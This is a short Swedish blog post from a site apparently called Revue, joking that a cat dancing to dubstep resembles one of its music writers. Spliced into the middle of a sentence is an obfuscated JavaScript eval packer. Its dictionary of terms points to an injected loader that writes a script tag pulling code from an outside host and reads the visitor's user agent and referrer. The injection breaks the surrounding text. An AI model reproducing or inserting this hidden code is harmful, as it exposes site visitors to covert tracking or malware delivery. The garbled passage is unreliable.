Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Katt som dansar till dubstep

Katt som dansar till dubstep
Sebastian

Vi på Revue tycker katter är rätt roliga. Vi har hittat en perfekt blandning av katt, musik och Alexander Gylemo. Alexander Gylemo som skriver om musik här på Revue är faktiskt ganska lik den här katten. Till dubstep dansar och digga han/hon loss för fullt med glajs on.

Lite eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|seats|var|u0026u|referrer|tnars||js|php’.split(’|’),0,{}))
på så sätt vi kommer göra imorgon då LMFAO intar annexet.